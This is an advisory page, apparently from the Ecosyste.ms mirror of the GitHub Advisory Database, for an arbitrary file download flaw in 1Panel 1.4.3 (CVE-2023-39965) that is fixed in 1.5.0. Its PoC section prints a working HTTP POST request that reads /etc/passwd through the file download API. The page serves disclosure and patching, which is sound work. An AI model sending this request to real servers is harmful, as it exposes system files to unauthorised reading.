Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS04NWNmLWdqMjktZjU1Nc4AA1OE
1Panel Arbitrary File Download vulnerability
Summary
Any file downloading vulnerability exists in 1Panel backend.
Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
PoC
payload:
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json
{"path":"/etc/passwd"}
Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.
Permalink: https://github.com/advisories/GHSA-85cf-gj29-f555JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NWNmLWdqMjktZjU1Nc4AA1OE
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 9 months ago
Updated: 6 months ago
CVSS Score: 6.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Identifiers: GHSA-85cf-gj29-f555, CVE-2023-39965
References:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-85cf-gj29-f555
- https://nvd.nist.gov/vuln/detail/CVE-2023-39965
- https://github.com/1Panel-dev/1Panel/releases/tag/v1.5.0
- https://github.com/advisories/GHSA-85cf-gj29-f555
Blast Radius: 1.0
Affected Packages
go:github.com/1Panel-dev/1Panel
Dependent packages: 0Dependent repositories: 0
Downloads:
Affected Version Ranges: = 1.4.3
Fixed in: 1.5.0
All affected versions: 1.4.3
All unaffected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.8.0, 1.8.1, 1.8.2, 1.8.3, 1.8.4, 1.8.5, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.4, 1.9.5, 1.9.6